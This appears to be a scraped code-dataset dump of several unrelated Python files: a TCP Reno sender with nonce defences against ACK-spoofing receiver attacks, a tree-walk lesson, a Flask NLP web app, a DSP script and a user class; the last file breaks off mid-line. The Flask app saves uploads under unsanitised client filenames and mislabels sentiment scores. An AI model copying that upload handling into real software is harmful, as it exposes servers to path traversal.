import all as scp\nimport argparse\nimport threading\nfrom collections import deque\nimport time\nfrom color import cc\nimport random\n\nMSS = 1400\nRETRANSMIT_TIMEOUT = 2.0 # sec\nDUMMY_PAYLOAD = \"*\" * MSS\nH1_ADDR = \"10.0.0.1\"\nH1_PORT = 20001\nH2_ADDR = \"10.0.0.2\"\nH2_PORT = 20002\n\n\nclass Nonce(scp.Packet):\n name = \"Nonce\"\n fields_desc = [scp.IntField(\"nonce\", 0), scp.IntField(\"reply\", 0)]\n\n\nclass TCP_Client:\n def __init__(self, role, host, **kwargs):\n self.seq = 0\n self.next_seq = 1\n self.ack = 1\n self.received_packets = deque()\n self.outstanding_segments = set()\n\n self.cwnd = 1 * MSS\n self.ssthresh = 64 * 1024 # 64KB\n self.dupack = 0\n self.state = \"slow_start\"\n # see [RFC 6298] on how the retransmission timer works\n self.retransmission_timer = None\n\n self.role = role # sender or receiver\n self.log_cache = None\n\n if host == \"h1\":\n self.src_ip = H1_ADDR\n self.dst_ip = H2_ADDR\n self.src_port = H1_PORT\n self.dst_port = H2_PORT\n\n if host == \"h2\":\n self.src_ip = H2_ADDR\n self.dst_ip = H1_ADDR\n self.src_port = H2_PORT\n self.dst_port = H1_PORT\n\n self.limit = None\n # stop the sender after seq_no exceeding this limit\n if role == \"sender\":\n if \"limit\" in kwargs:\n self.limit = kwargs[\"limit\"]\n # list of time logs for plotting\n self.seq_log, self.ack_log = [], []\n self.log_attacker = False\n # verbose flag\n self.verbose = kwargs[\"verbose\"]\n\n \"\"\"\n [defense against DupACK spoofing and Optimistic ACKing]\n We use the \"Singular Nonce\" technique described in section 4.3.\n For each data segment that we send, we include a random 32-bit\n nonce. An ACK is only valid if it contains one of these nonces.\n When we receive a valid ACK, we remove the nonce it replies from\n the nonce pool.\n Therefore, DupACK spoofing or Optimistic ACKing are no longer\n viable because no more spoofed ACKs can be created a priori than\n there are actual data segments sent.\n \"\"\"\n self.nonce_pool = {}\n\n # seed the pseudorandom generator\n random.seed()\n\n # bind Nonce to TCP so that scapy can decode Nonce layer\n scp.bind_layers(scp.TCP, Nonce, dport=H1_PORT)\n scp.bind_layers(scp.TCP, Nonce, dport=H2_PORT)\n\n def get_nonce(self):\n nonce = random.getrandbits(32)\n self.nonce_pool[nonce] = self.nonce_pool.get(nonce, 0) + 1\n return nonce\n\n def send(self):\n if self.limit and self.next_seq > self.limit:\n return\n packet = (\n scp.IP(src=self.src_ip, dst=self.dst_ip)\n / scp.TCP(\n sport=self.src_port, dport=self.dst_port, flags=\"\", seq=self.next_seq\n )\n / Nonce(nonce=self.get_nonce())\n / (DUMMY_PAYLOAD)\n )\n scp.send(packet, verbose=0)\n self.next_seq += MSS\n if self.retransmission_timer is None:\n self.retransmission_timer = time.time()\n self.xprint(\n cc.OKBLUE\n + \"(sent) data seq=%d:%d\"\n % (packet[scp.TCP].seq, packet[scp.TCP].seq + MSS - 1)\n + cc.ENDC\n )\n\n def resend(self, event):\n packet = (\n scp.IP(src=self.src_ip, dst=self.dst_ip)\n / scp.TCP(\n sport=self.src_port, dport=self.dst_port, flags=\"\", seq=self.seq + 1\n )\n / Nonce(nonce=self.get_nonce())\n / (DUMMY_PAYLOAD)\n )\n self.retransmission_timer = time.time()\n scp.send(packet, verbose=0)\n self.xprint(\n cc.WARNING\n + \"(resent:%s) data seq=%d:%d\"\n % (event, packet[scp.TCP].seq, packet[scp.TCP].seq + MSS - 1)\n + cc.ENDC\n )\n\n def send_ack(self, ack_no, nonce):\n # update ack log\n packet = (\n scp.IP(src=self.src_ip, dst=self.dst_ip)\n / scp.TCP(sport=self.src_port, dport=self.dst_port, flags=\"A\", ack=ack_no)\n / Nonce(reply=nonce)\n )\n 
scp.send(packet, verbose=0)\n self.ack_log.append((time.time() - self.base_time, ack_no))\n self.xprint(cc.OKBLUE + \"(sent) ack ack=%d\" % ack_no + cc.ENDC)\n\n def send_fin(self):\n packet = scp.IP(src=self.src_ip, dst=self.dst_ip) / scp.TCP(\n sport=self.src_port, dport=self.dst_port, flags=\"F\"\n )\n scp.send(packet, verbose=0)\n if self.role == \"sender\":\n msg = \"all data sent\"\n else:\n msg = \"all data received\"\n self.xprint(cc.OKBLUE + \"(sent) fin [%s]\" % msg + cc.ENDC)\n\n def timeout(self):\n if self.retransmission_timer is None:\n return\n elif self.retransmission_timer + RETRANSMIT_TIMEOUT < time.time():\n # on timeout\n self.resend(\"timeout\")\n self.state = \"slow_start\"\n self.ssthresh = self.cwnd / 2\n self.cwnd = 1 * MSS\n self.dupack = 0\n\n def post_receive(self, pkt, status):\n # called after a data segment is received\n # subclass overwrites this function to implement attacks\n\n # extract nonce\n nonce = pkt[Nonce].nonce\n\n self.send_ack(self.ack, nonce)\n\n def receive(self):\n if len(self.received_packets) == 0:\n return\n pkt = self.received_packets.popleft()[0]\n\n # data packet received\n if pkt[scp.TCP].flags == 0:\n # update seq log\n self.seq_log.append((time.time() - self.base_time, pkt[scp.TCP].seq))\n self.xprint(\n cc.OKGREEN\n + \"(received) data seq=%d:%d\"\n % (pkt[scp.TCP].seq, pkt[scp.TCP].seq + MSS - 1)\n + cc.ENDC\n )\n if pkt[scp.TCP].seq == self.ack:\n status = \"new\"\n self.ack += MSS\n while self.ack in self.outstanding_segments:\n self.outstanding_segments.remove(self.ack)\n self.ack += MSS\n elif pkt[scp.TCP].seq > self.ack:\n # a future packet (queue it)\n status = \"future\"\n self.outstanding_segments.add(pkt[scp.TCP].seq)\n else:\n status = \"duplicate\"\n self.post_receive(pkt, status)\n # ack received\n elif pkt[scp.TCP].flags & 0x10: # ACK\n is_ack_valid = True\n\n # [defense against ACK division]\n # reject non-aligned acks\n if (pkt[scp.TCP].ack - 1) % MSS != 0:\n is_ack_valid = False\n\n # [defense against DupACK spoofing and Optimistic ACKing]\n # reject ACK with invalid nonce\n elif not pkt.haslayer(Nonce):\n is_ack_valid = False\n\n else:\n nonce_reply = pkt[Nonce].reply\n nonce_cnt = self.nonce_pool.get(nonce_reply, 0)\n if nonce_cnt == 0:\n is_ack_valid = False\n else:\n # remove nonce from nonce_pool\n if nonce_cnt == 1:\n del self.nonce_pool[nonce_reply]\n else:\n self.nonce_pool[nonce_reply] = nonce_cnt - 1\n\n if is_ack_valid:\n self.xprint(\n cc.OKGREEN\n + \"(received) ack ack=:%d\" % (pkt[scp.TCP].ack - 1)\n + cc.ENDC\n )\n else:\n self.xprint(\n cc.FAIL\n + \"(received) invalid ack ack=:%d\" % (pkt[scp.TCP].ack - 1)\n + cc.ENDC\n )\n return\n\n if pkt[scp.TCP].ack - 1 > self.seq:\n # new ack\n self.seq = pkt[scp.TCP].ack - 1\n \"\"\"\n [RFC 6298]\n (5.3) When an ACK is received that acknowledges new data, \n restart the retransmission timer so that it will expire after \n RTO seconds (for the current value of RTO).\n \"\"\"\n self.retransmission_timer = time.time() # restart timer\n if self.state == \"slow_start\":\n self.cwnd += MSS\n elif self.state == \"congestion_avoidance\":\n self.cwnd += MSS * MSS / self.cwnd\n elif self.state == \"fast_recovery\":\n self.state = \"congestion_avoidance\"\n self.cwnd = self.ssthresh\n self.dupack = 0\n else:\n # duplicate ack\n self.dupack += 1\n \"\"\"\n [RFC 5681]\n On the first and second duplicate ACKs received at a \n sender, a TCP SHOULD send a segment of previously unsent data \n per [RFC 3042] provided that the receiver's advertised window \n allows, the total 
Flight Size would remain less than or \n equal to cwnd plus 2*SMSS, and that new data is available \n for transmission. Further, the TCP sender MUST NOT change \n cwnd to reflect these two segments [RFC 3042].\n \"\"\"\n if self.dupack < 3:\n self.send()\n elif self.dupack == 3:\n self.state = \"fast_recovery\"\n self.ssthresh = self.cwnd / 2\n self.cwnd = self.ssthresh + 3 * MSS\n # retransmit missing packet\n self.resend(\"triple-ack\")\n elif self.state == \"fast_recovery\":\n # [defense against DupACK spoofing]\n \"\"\"\n [RFC 5681] Section 3.2\n We limit the artificially inflated cwnd to the\n number of outstanding packets.\n \"\"\"\n if self.cwnd + MSS <= self.next_seq - self.seq - 1:\n self.cwnd += MSS\n # fin received\n elif pkt[scp.TCP].flags & 0x1: # FIN\n self.xprint(cc.OKGREEN + \"(received) fin\" + cc.ENDC)\n if self.role == \"sender\" and self.state == \"fin_sent\":\n return \"tear_down\"\n if self.role == \"receiver\":\n self.send_fin()\n return \"tear_down\"\n\n def log_status(self):\n out = \"(control:%s) cwnd=%d, ssthread=%d\" % (\n self.state,\n self.cwnd,\n self.ssthresh,\n )\n if out != self.log_cache:\n self.xprint(out)\n self.log_cache = out\n\n def xprint(self, content):\n if not self.verbose:\n return\n timestamp = time.time() - self.base_time\n print(cc.BOLD + \"{:6.3f} \".format(timestamp) + cc.ENDC + content)\n\n def start_sender(self):\n self.xprint(\"retransmission timeout: %.1fs\" % RETRANSMIT_TIMEOUT)\n last_log_time = 0\n while True:\n if self.state == \"slow_start\" and self.cwnd >= self.ssthresh:\n self.state = \"congestion_avoidance\"\n if self.next_seq - self.seq - 1 < self.cwnd:\n self.send()\n if self.receive() == \"tear_down\":\n self.state = \"tear_down\"\n break\n if self.state != \"fin_sent\":\n self.timeout()\n\n # send FIN when data sent over pre-specified limit\n if self.limit and self.seq >= self.limit:\n if (\n self.state == \"fin_sent\"\n and self.retransmission_timer + RETRANSMIT_TIMEOUT < time.time()\n ):\n continue\n self.send_fin()\n self.retransmission_timer = 0\n self.state = \"fin_sent\"\n\n self.log_status()\n\n def start_receiver(self):\n while True:\n if self.receive() == \"tear_down\":\n self.state = \"tear_down\"\n break\n\n def listen(self):\n def match_packet(pkt):\n return (\n pkt.haslayer(scp.IP)\n and pkt[scp.IP].src == self.dst_ip\n and pkt[scp.IP].dst == self.src_ip\n and pkt.haslayer(scp.TCP)\n and pkt[scp.TCP].sport == self.dst_port\n and pkt[scp.TCP].dport == self.src_port\n ) and pkt[\n scp.TCP\n ].flags & 0x4 == 0 # ignore RST\n\n def queue_packet(pkt):\n self.received_packets.append((pkt, time.time()))\n\n def stop_packet(pkt):\n return pkt.haslayer(scp.TCP) and pkt[scp.TCP].flags & 0x1 != 0 # FIN flag\n\n scp.sniff(lfilter=match_packet, prn=queue_packet, stop_filter=stop_packet)\n\n def write_logs_to_files(self):\n filename = \"attack_log.txt\" if self.log_attacker else \"log.txt\"\n f = open(filename, \"w\")\n for time, seq in self.seq_log:\n f.write(\"%s,%.3f,%d\\n\" % (\"seq\", time, seq))\n for time, ack in self.ack_log:\n f.write(\"%s,%.3f,%d\\n\" % (\"ack\", time, ack))\n f.close()\n\n def start(self):\n listen_t = threading.Thread(target=self.listen)\n # set it to daemon so that it will be killed when the main thread\n # exits\n listen_t.daemon = True\n listen_t.start()\n\n self.base_time = time.time()\n self.xprint(\"connection started\")\n if self.role == \"sender\":\n self.start_sender()\n if self.role == \"receiver\":\n self.start_receiver()\n self.xprint(\"connection terminated\")\n\n if self.role == 
\"receiver\":\n self.xprint(\"writing seq/ack logs to file ...\")\n self.write_logs_to_files()\n self.xprint(\"writing logs done!\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Naive TCP.\")\n parser.add_argument(\n \"--role\",\n dest=\"role\",\n required=True,\n help=\"The role of the TCP client (`sender` or `receiver`)\",\n )\n parser.add_argument(\n \"--host\", dest=\"host\", required=True, help=\"Mininet host (`h1` or `h2`)\"\n )\n parser.add_argument(\n \"--rtt\",\n dest=\"rtt\",\n type=int,\n help=\"The estimated RTT specified in Mininet (in ms).\",\n )\n parser.add_argument(\n \"--limit\",\n dest=\"limit\",\n type=int,\n help=\"Limit the total amount of data to send (in kB).\",\n )\n parser.add_argument(\n \"--verbose\",\n dest=\"verbose\",\n action=\"store_true\",\n help=\"Verbose flag for TCP communication log.\",\n )\n args = parser.parse_args()\n\n kwargs = {}\n if args.limit is not None:\n kwargs[\"limit\"] = args.limit * 1000\n kwargs[\"verbose\"] = args.verbose\n\n if args.rtt is not None:\n # set retransmission timeout to 4 * RTT\n RETRANSMIT_TIMEOUT = max(1.0, args.rtt / 250.0)\n\n tcp = TCP_Client(args.role, args.host, **kwargs)\n tcp.start()\n","sub_path":"project/experiments/misbehaving_receiver/reno_enhanced.py","file_name":"reno_enhanced.py","file_ext":"py","file_size_in_byte":15226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"123465288","text":"from random import randint, shuffle\n\n\nclass Node:\n def __init__(self, colors, flag=None):\n self.left_child_color, self.right_child_color = colors\n self.parent_color = None\n self.id = 0\n if flag:\n self.left_child = None\n self.right_child = None\n\n\nclass Tree:\n def __init__(self, sz):\n self.tree = [Node([None, None]) for _ in range(sz)]\n\n def add_is_valid(self, index_new_node, new_node):\n parent = (index_new_node - 1) // 2\n left_child = 2 * parent + 1\n right_child = 2 * parent + 2\n\n if self.tree[0].left_child_color is None:\n return True, None\n\n elif left_child == index_new_node:\n if self.tree[parent].left_child_color in new_node:\n return False, None\n else:\n return True, self.tree[parent].left_child_color\n elif right_child == index_new_node:\n if self.tree[parent].right_child_color in new_node:\n return False, None\n else:\n return True, self.tree[parent].right_child_color\n\n def add(self, index, node):\n temp = self.add_is_valid(index, node)\n add_is_valid = temp[0]\n if not add_is_valid:\n return False\n\n self.tree[index].left_child_color = node[0]\n self.tree[index].right_child_color = node[1]\n self.tree[index].parent_color = temp[1]\n return True\n\n def __iter__(self):\n return iter(self.tree)\n\n\nclass BWT:\n COLORS = {\n 1: 'green',\n 2: 'blue',\n 3: 'red',\n 4: 'purple'\n }\n\n def __init__(self, depth=4, count_colors=4):\n self.top_tree = Tree(2 ** depth - 1)\n self.bottom_tree = Tree(2 ** depth - 1)\n self.relationship_trees = []\n self.depth = depth\n self.count_colors = count_colors\n self.id = -1\n\n def generate_random_colors(self, exclude=[]):\n colors = set()\n while len(colors) < 2:\n color = randint(1, self.count_colors)\n if color in exclude:\n continue\n colors.add(color)\n return list(colors)\n\n def coloring_random_tree(self, tree):\n for index, node in enumerate(tree.tree):\n self.id += 1\n # листьям не раскрашиваем, но запоминаем цвет родителя\n if index * 2 + 1 >= len(tree.tree):\n tree.tree[index] = Node([None, None], flag=True)\n parent = tree.add_is_valid(index, [None, 
None])[1]\n tree.tree[index].parent_color = parent\n tree.tree[index].id = self.id\n continue\n\n tree.tree[index].id = self.id\n is_valid = False\n while not is_valid:\n new_node = self.generate_random_colors()\n is_valid = tree.add(index, new_node)\n\n return tree\n\n def copy_colors(self, tree1, tree2):\n for index, node in enumerate(tree1.tree):\n self.id += 1\n tree2.tree[index].id = index\n if index * 2 + 1 >= len(tree1.tree):\n tree2.tree[index] = (Node([None, None], flag=True))\n tree2.tree[index].parent_color = node.parent_color\n tree2.tree[index].id = self.id\n continue\n tree2.tree[index].id = self.id\n tree2.tree[index].left_child_color = node.left_child_color\n tree2.tree[index].right_child_color = node.right_child_color\n tree2.tree[index].parent_color = node.parent_color\n\n return tree2\n\n def coloring_mirror_tree(self, tree1, tree2):\n self.coloring_random_tree(tree1)\n self.copy_colors(tree1, tree2)\n return tree1, tree2\n\n def create_tree(self, tree):\n \"\"\"тестовая функция\"\"\"\n return self.coloring_random_tree(tree)\n\n def bind_trees(self, tree1, tree2):\n last_level = -2 ** (self.depth - 1)\n\n top_tree = tree1.tree[last_level:]\n bottom_tree = tree2.tree[last_level:]\n\n while None in [i.right_child for i in top_tree] or\\\n None in [i.right_child for i in bottom_tree]:\n\n shuffle(top_tree)\n shuffle(bottom_tree)\n\n for index in range(len(top_tree)):\n exclude = [top_tree[index].parent_color,\n bottom_tree[index].parent_color]\n colors = self.generate_random_colors(exclude=exclude)\n\n top_tree[index].left_child = bottom_tree[index]\n top_tree[index].left_child_color = colors[0]\n top_tree[index].right_child_color = colors[1]\n\n bottom_tree[index].left_child = top_tree[index]\n bottom_tree[index].left_child_color = colors[0]\n bottom_tree[index].right_child_color = colors[1]\n\n for node_top in top_tree:\n for node_bottom in bottom_tree:\n if node_top.right_child_color == node_bottom.right_child_color:\n if node_top.left_child != node_bottom and \\\n node_bottom.left_child != node_top:\n node_top.right_child = node_bottom\n node_bottom.right_child = node_top\n break\n\n self.relationship_trees = tree1.tree[last_level:] + tree2.tree[last_level:]\n return self.relationship_trees\n\n def get_node(self, id):\n for node in self.top_tree.tree:\n if node.id == id:\n return node\n for node in self.bottom_tree.tree:\n if node.id == id:\n return node\n return None\n\n @staticmethod\n def counting_color_in_path(path, color):\n count = 0\n for node in path:\n if node.parent_color == color:\n count += 1\n return count\n\n def counting_colors_all_paths(self, paths, color):\n count_colors = {}\n for key in paths.keys():\n count_colors[key] = self.counting_color_in_path(paths[key], color)\n return count_colors\n\n def find_all_paths_tree(self, tree):\n last_level = -2 ** (self.depth - 1)\n paths = {}\n for node in tree.tree[last_level:]:\n path = [node]\n i_node = tree.tree.index(node)\n i_parent = (i_node - 1) // 2\n\n while i_parent >= 0:\n path.append(tree.tree[i_parent])\n i_parent = (i_parent - 1) // 2\n paths[node] = path[::-1]\n\n return paths\n\n def find_all_paths_bwt(self, color):\n paths_top = self.find_all_paths_tree(self.top_tree)\n paths_bottom = self.find_all_paths_tree(self.bottom_tree)\n\n count_colors_top = self.counting_colors_all_paths(paths_top, color)\n count_colors_bottom = self.counting_colors_all_paths(paths_bottom, color)\n\n all_paths = []\n\n for leaf in paths_top:\n # по \"левому пути\"\n path = paths_top[leaf] + 
paths_bottom.get(leaf.left_child)[::-1]\n count_colors = count_colors_top.get(leaf) + count_colors_bottom.get(\n leaf.left_child)\n if leaf.left_child_color == color:\n count_colors += 1\n all_paths.append((path, count_colors))\n # по \"правому пути\"\n path = paths_top[leaf] + paths_bottom.get(leaf.right_child)[::-1]\n count_colors = count_colors_top.get(leaf) + count_colors_bottom.get(\n leaf.right_child)\n if leaf.right_child_color == color:\n count_colors += 1\n all_paths.append((path, count_colors))\n\n return all_paths\n\n def optimal_way(self, color, mx=None, mn=None):\n all_paths = self.find_all_paths_bwt(color)\n\n if mx:\n all_paths.sort(key=lambda x: x[1], reverse=True)\n elif mn:\n all_paths.sort(key=lambda x: x[1])\n\n return all_paths[0]\n\n @staticmethod\n def condition_for_step_leaf(leaf, step):\n\n # left\n if step == 2:\n leaf = leaf.left_child\n\n # right\n else:\n leaf = leaf.right_child\n return leaf\n\n def condition_for_step_node(self, tree, node, step):\n index_node = tree.tree.index(node)\n left_child = index_node * 2 + 1\n right_child = index_node * 2 + 2\n\n # parent\n if step == 1:\n if node.parent_color is None:\n return node\n node = tree.tree[(index_node - 1) // 2]\n\n # left\n elif step == 2:\n # если лист\n if left_child > len(tree.tree) - 1:\n return self.condition_for_step_leaf(node, step)\n node = tree.tree[left_child]\n\n # right\n else:\n # если лист\n if right_child > len(tree.tree) - 1:\n return self.condition_for_step_leaf(node, step)\n node = tree.tree[right_child]\n return node\n\n def take_step(self, node, step):\n if node in self.top_tree:\n current_tree = self.top_tree\n else:\n current_tree = self.bottom_tree\n\n return self.condition_for_step_node(current_tree, node, step)\n\n def random_walk(self, node):\n current_node = self.top_tree.tree[0]\n count_steps = 0\n\n while current_node != node:\n random_step = randint(1, 3)\n count_steps += 1\n current_node = self.take_step(current_node, random_step)\n\n return current_node.id, count_steps\n\n def quantum_walk(self, node):\n nodes = [self.top_tree.tree[0]]\n count_steps = 0\n\n while node not in nodes:\n\n for i in range(len(nodes)):\n current_node = nodes[i]\n random_step = randint(1, 3)\n first_node = self.take_step(current_node, random_step)\n # nodes[i] = first_node\n if first_node in nodes:\n nodes.pop(nodes.index(first_node))\n nodes.append(first_node)\n\n random_step = randint(1, 3)\n second_node = self.take_step(current_node, random_step)\n if second_node in nodes:\n nodes.pop(nodes.index(second_node))\n nodes.append(second_node)\n count_steps += 1\n\n return len(nodes), count_steps\n","sub_path":"lesson28_BWT.py","file_name":"lesson28_BWT.py","file_ext":"py","file_size_in_byte":10421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"623353915","text":"from nltk.sentiment.vader import SentimentIntensityAnalyzer\nfrom flask import Flask, render_template, request, Markup, jsonify\nimport os\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom gensim.corpora.dictionary import Dictionary\nfrom collections import defaultdict\nimport itertools\nfrom gensim.models.tfidfmodel import TfidfModel\nimport spacy\nfrom spacy import displacy\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification\napp = Flask(__name__)\napp.config[\"UPLOAD PATH\"] = \"upload\"\nimport nltk\n\nnltk.download('vader_lexicon')\n\n\n@app.route(\"/\", methods=[\"GET\", 
\"POST\"])\ndef upload_file():\n articles = []\n all_text = []\n tf = []\n bow = []\n gg = []\n find_word = request.form.get(\"text\")\n if request.method == \"GET\":\n dir = './upload'\n for f in os.listdir(dir):\n os.path.join(dir, f)\n os.remove(os.path.join(dir, f))\n if request.method == \"POST\":\n dir = './upload'\n for f in os.listdir(dir):\n os.path.join(dir, f)\n os.remove(os.path.join(dir, f))\n for f in request.files.getlist('file_name'):\n test = os.path.join(app.config[\"UPLOAD PATH\"], f.filename)\n f.save(os.path.join(app.config[\"UPLOAD PATH\"], f.filename))\n all_text.append(test)\n\n for i in all_text:\n # Read TXT file\n f = open(i, \"r\", encoding=\"utf8\")\n article = f.read()\n # Tokenize the article: tokens\n tokens = word_tokenize(article)\n # Convert the tokens into lowercase: lower_tokens\n lower_tokens = [t.lower() for t in tokens]\n # Retain alphabetic words: alpha_only\n alpha_only = [t for t in lower_tokens if t.isalpha()]\n # Remove all stop words: no_stops\n no_stops = [\n t for t in alpha_only if t not in stopwords.words('english')]\n # Instantiate the WordNetLemmatizer\n wordnet_lemmatizer = WordNetLemmatizer()\n # Lemmatize all tokens into a new list: lemmatized\n lemmatized = [wordnet_lemmatizer.lemmatize(t) for t in no_stops]\n # list_article\n articles.append(lemmatized)\n dictionary = Dictionary(articles)\n\n def BOW(articles):\n a = []\n corpus = [dictionary.doc2bow(a) for a in articles]\n # Save the second document: doc\n doc = corpus[0]\n # Sort the doc for frequency: bow_doc\n bow_doc = sorted(doc, key=lambda w: w[1], reverse=True)\n for word_id, word_count in bow_doc[:5]:\n (dictionary.get(word_id), word_count)\n total_word_count = defaultdict(int)\n for word_id, word_count in itertools.chain.from_iterable(corpus):\n total_word_count[word_id] += word_count\n # Create a sorted list from the defaultdict: sorted_word_count\n sorted_word_count = sorted(\n total_word_count.items(), key=lambda w: w[1], reverse=True)\n for word_id, word_count in sorted_word_count[:5]:\n final = (dictionary.get(word_id), word_count)\n a.append(final)\n return a\n\n def tf_idf(articles):\n b = []\n corpus = [dictionary.doc2bow(a) for a in articles]\n # Save the second document: doc\n doc = corpus[0]\n tfidf = TfidfModel(corpus)\n # Calculate the tfidf weights of doc: tfidf_weights\n tfidf_weights = tfidf[doc]\n # Sort the weights from highest to lowest: sorted_tfidf_weights\n sorted_tfidf_weights = sorted(\n tfidf_weights, key=lambda w: w[1], reverse=True)\n # Print the top 5 weighted words\n for term_id, weight in sorted_tfidf_weights[:5]:\n final2 = dictionary.get(term_id), weight\n b.append(final2)\n return b\n bow = BOW(articles)\n tf = tf_idf(articles)\n data = {\n 'result1': bow,\n 'result2': tf,\n }\n return render_template(\"find.html\", **data)\n return render_template('index.html')\n\n\n@app.route('/lab2.html', methods=['GET', 'POST'])\ndef lab2():\n if request.method == \"POST\":\n nlp = spacy.load('en_core_web_sm')\n firstname = request.form['firstname'].strip()\n doc = nlp(firstname)\n html = displacy.render(doc, style=\"ent\")\n return jsonify({'output': Markup(html)})\n return render_template('lab2.html')\n\n\n@app.route('/filter', methods=['GET', 'POST'])\ndef filter1():\n if request.method == \"POST\":\n nlp = spacy.load('en_core_web_sm')\n firstname = request.form['text'].strip()\n filter = request.form.getlist('filter[]')\n doc = nlp(firstname)\n ft = {\"ents\": filter}\n html = displacy.render(doc, style=\"ent\", options=ft)\n return 
jsonify({'output': Markup(html)})\n return render_template('lab2.html')\n\n\n@app.route('/fakeNews', methods=['GET', 'POST'])\ndef fakeNews():\n if request.method == \"POST\":\n model_path = \"model\"\n real_news = request.form['text'].strip()\n model = AutoModelForSequenceClassification.from_pretrained(model_path)\n tokenizer = AutoTokenizer.from_pretrained(model_path)\n\n def get_prediction(text, convert_to_label=False):\n # prepare our text into tokenized sequence\n inputs = tokenizer(text, padding=True, truncation=True, max_length=512,\n return_tensors=\"pt\")\n # perform inference to our model\n outputs = model(**inputs)\n # get output probabilities by doing softmax\n probs = outputs[0].softmax(1)\n # executing argmax function to get the candidate label\n d = {\n 0: \"reliable\",\n 1: \"fake\"\n }\n if convert_to_label:\n return d[int(probs.argmax())]\n else:\n return int(probs.argmax())\n predict = get_prediction(real_news, convert_to_label=True)\n # # read the test set\n # test_df = pd.read_csv(\"fake_news/test_lite.csv\", encoding='latin1')\n # # make a copy of the testing set\n # new_df = test_df.copy()\n # # add a new column that contains the author, title and article content\n # new_df[\"new_text\"] = new_df[\"author\"].astype(\n # str) + \" : \" + new_df[\"title\"].astype(str) + \" - \" + new_df[\"text\"].astype(str)\n # # get the prediction of all the test set\n # new_df[\"label\"] = new_df[\"new_text\"].apply(get_prediction)\n # # make the submission file\n # final_df = new_df[[\"id\", \"label\"]]\n # final_df.to_csv(\"submit_final.csv\", index=False)\n return jsonify({'output': predict})\n return render_template('fakeNews.html')\n\n\n@app.route('/search', methods=['GET', 'POST'])\ndef search():\n articles = []\n if (request.method == \"POST\"):\n find_word = request.form.get(\"text\")\n dir = './upload'\n tmp_file = []\n textfile = []\n for f in os.listdir(dir):\n test = None\n test1 = []\n gg = os.path.join(dir, f)\n rr = os.path.join(f)\n textfile.append(rr)\n f = open(gg, \"r\", encoding=\"utf8\")\n article = f.read()\n tokens = word_tokenize(article)\n # Convert the tokens into lowercase: lower_tokens\n lower_tokens = [t.lower() for t in tokens]\n # Retain alphabetic words: alpha_only\n alpha_only = [t for t in lower_tokens if t.isalpha()]\n # Remove all stop words: no_stops\n no_stops = [\n t for t in alpha_only if t not in stopwords.words('english')]\n # Instantiate the WordNetLemmatizer\n wordnet_lemmatizer = WordNetLemmatizer()\n # Lemmatize all tokens into a new list: lemmatized\n lemmatized = [wordnet_lemmatizer.lemmatize(t) for t in no_stops]\n # list_article\n articles.append(lemmatized)\n test1.append(lemmatized)\n dictionary = Dictionary(articles)\n test = Dictionary(test1)\n computer_id = test.token2id.get(find_word)\n tmp_file.append(computer_id)\n data = {'count': tmp_file,\n 'keyword': find_word, 'text_file': textfile}\n return (data)\n return render_template('find.html')\n\n\n@app.route('/sentiment', methods=['GET', 'POST'])\ndef sentiment():\n if request.method == \"POST\":\n text = request.form['text'].strip()\n clean_txt = text.replace(\"[^a-zA-Z#]\", \" \")\n clean_txt = clean_txt.casefold()\n print(clean_txt)\n sid = SentimentIntensityAnalyzer()\n scores = sid.polarity_scores(text)\n for key, value in scores.items():\n result = value\n status = ''\n if(result < 0.5):\n status = 'Negative'\n if(result == 0.5):\n status = 'Neutral'\n if(result > 0.5):\n status = 'Positive'\n data = 'Your comment is ' +status+' And Score : ' + str(result)\n return 
(data)\n return render_template('sentiment.html')\n\n\nif __name__ == \"__main__\":\n # app.run(host='0.0.0.0',port=8080)\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"66364635","text":"import thinkdsp\r\nimport matplotlib.pyplot as plt\r\nfrom winsound import PlaySound\r\nimport numpy as np\r\nsignal_tri = thinkdsp.TriangleSignal(440)\r\nplt.subplot(411)\r\nsignal_tri.plot()\r\nwave = signal_tri.make_wave(duration=0.01, framerate=10000)\r\nspectrum = wave.make_spectrum()\r\nplt.subplot(412)\r\nspectrum.plot()\r\nprint(spectrum.hs[0])\r\nprint(np.angle(spectrum.hs[0]))\r\nprint(np.abs(spectrum.hs[0]))\r\nspectrum.hs[0] = 100\r\nprint(spectrum.hs[0])\r\nprint(type(spectrum.hs[0]))\r\nwave = spectrum.make_wave()\r\nplt.subplot(413)\r\nwave.plot()\r\nspectrum = wave.make_spectrum()\r\nplt.subplot(414)\r\nspectrum.plot()\r\nplt.show()\r\n\r\n","sub_path":".vscode/20210609/20210609-3.py","file_name":"20210609-3.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"379720891","text":"import const\n\n\nclass User(object):\n def __init__(self, id, username=None, first_name=None, last_name=None):\n self.id = id\n self.username = username\n self.first_name = first_name\n self.last_name = last_name\n self.keywords = set()\n self.notifications = set()\n self.menu_state = const.START\n\n def __str__(self):\n return \"id=[{}]\".format(\n self.id\n )\n\n def add_keywords(self, keywords):\n for kw in keywords:\n self.keywords.add(kw)\n\n def remove_keywords(self, keywords):\n for kw in keywords:\n if kw in self.keywords:\n self.keywords.remove(kw)\n\n def add_notification(self, notification):\n exists = False\n for n in self.notifications:\n if n == notification:\n exists = True\n if not exists:\n self.notifications.add(notification)\n # print(\"Notification is added for {} exist with {} {}\".format(self.id, notification.text.encode(), notification.date.encode()))\n","sub_path":"src/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"413463493","text":"from sys import argv\r\nfrom util import convertDictToList, flatten, sortBySecond, stringify\r\n\r\nplayer = argv[1]\r\nk = argv[2]\r\nvariant_stats = {}\r\n\r\nplayer_data = open('output/individual_stats/%s.csv'%player, encoding='utf-8').readlines()\r\nplayer_data = player_data[-1:0:-1]\r\n\r\nfreq = {}\r\n\r\nfor row in player_data:\r\n if row != '':\r\n 